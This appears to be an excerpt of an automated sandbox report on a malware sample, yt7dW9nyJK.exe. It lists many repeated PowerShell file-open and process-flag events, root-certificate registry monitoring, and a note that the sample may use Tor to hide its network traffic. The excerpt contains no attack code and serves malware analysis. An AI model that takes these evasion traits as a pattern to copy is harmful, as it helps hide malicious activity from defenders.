                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                May use the Tor software to hide its network traffic
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: onion-port
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
